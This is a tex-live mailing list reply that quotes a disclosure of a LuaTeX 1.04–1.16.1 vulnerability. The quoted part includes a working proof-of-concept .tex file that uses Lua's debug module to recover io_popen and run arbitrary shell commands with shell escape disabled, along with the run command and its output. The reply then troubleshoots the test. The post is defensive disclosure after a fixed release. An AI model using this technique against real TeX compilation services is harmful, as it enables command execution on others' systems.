More info about LuaTeX 1.17.0 (security update)
Ken Moffat
zarniwhoop at ntlworld.com
Mon May 22 22:59:38 CEST 2023
On Mon, May 22, 2023 at 04:31:27AM -0600, Max Chernoff wrote:
> Hi all,
>
> A few weeks ago, Luigi and the TeX Live team released LuaTeX 1.17.0. In
> the announcement email, Karl was initially pretty vague:
>
> > FYI: some issues have been found in luatex (obscure ways to work around
> > some security features; thanks to Max Chernoff). Luigi has committed
> > fixes to the sources, and we are rebuilding now. The new luatex version
> > is 1.17.0. All four luatex binaries (luatex luahbtex luajitex luajithbtex)
> > are affected.
>
> Enough time has passed, so I'll share some more details now.
>
> Through some trickery with the debug module, any document compiled with
> older versions of LuaTeX (1.04--1.16.1) can execute arbitrary shell
> commands, even with shell escape completely disabled. Vulnerable
> versions were included in TeX Live 2017--2023 and MiKTeX 2.9.6300--23.4;
> updated versions of TeX Live 2023 and MiKTeX 23.5 include the fixed
> 1.17.0 version.
>
> Here's a test document:
>
> % shell-escape-test.tex
> \directlua{
> local function get_upvalue(func, name)
> local nups = debug.getinfo(func).nups
>
> for i = 1, nups do
> local current, value = debug.getupvalue(func, i)
> if current == name then
> return value
> end
> end
> end
>
> local outer = get_upvalue(io.popen, "popen")
> local popen = get_upvalue(outer or io.popen, "io_popen")
>
> print(popen(arg[rawlen(arg)]):read("*a"))
> }
> \csname@@end\endcsname
> \end
>
> If you're using a vulnerable version of LuaTeX, then the output will
> look something like this:
>
> $ lualatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
> This is LuaHBTeX, Version 1.16.0 (TeX Live 2023)
> restricted system commands enabled.
> (./shell-escape-test.tex
> LaTeX2e <2022-11-01> patch level 1
> L3 programming layer <2023-04-20>@@@VULNERABLE@@@
> [...]
>
> If you're using a safe/fixed version, then you'll see this:
>
> $ luatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
> This is LuaTeX, Version 1.17.0 (TeX Live 2023)
> restricted system commands enabled.
> (./shell-escape-test.tex[\directlua]:1: attempt to call a nil value (local 'popen')
> [...]
>
> This issue affects all operating systems/architectures, and all LuaTeX
> formats except for ConTeXt. Further details are available at:
>
> https://tug.org/~mseven/luatex.html
>
> Feel free to reply if you have any questions.
>
> Thanks,
> -- Max
Thanks for the details. Unfortunately, the machine where I
patched the source to hopefully fix this for BLFS has died.
On the machine I'm currently using I've got an original TL2023
binary install, but after pasting the example from
https://tug.org/~mseven/luatex.html I get the following:
en at deluxe /tmp $lualatex shell-escape-test.tex
This is LuaHBTeX, Version 1.16.0 (TeX Live 2023)
restricted system commands enabled.
(./shell-escape-test.tex
LaTeX2e <2022-11-01> patch level 1
L3 programming layer <2023-02-22>sh: line 1: shell-escape-test.tex: command not found
)
296 words of node memory still in use:
1 hlist, 3 kern, 1 glyph, 1 attribute, 39 glue_spec, 1 attribute_list nodes
avail lists: 2:10,3:3,4:1,5:1
warning (pdf backend): no pages of output.
Transcript written on shell-escape-test.log.
Not surprising, I do not normally make tex source executable.
But chmod 755 does not help.
Confused.
ĸen
--
They feel among themselves that everything that is being done is
bad - even though that everything is done by their own party.
- Anthony Trollope, 'The Eustace Diamonds'
More information about the tex-live
mailing list.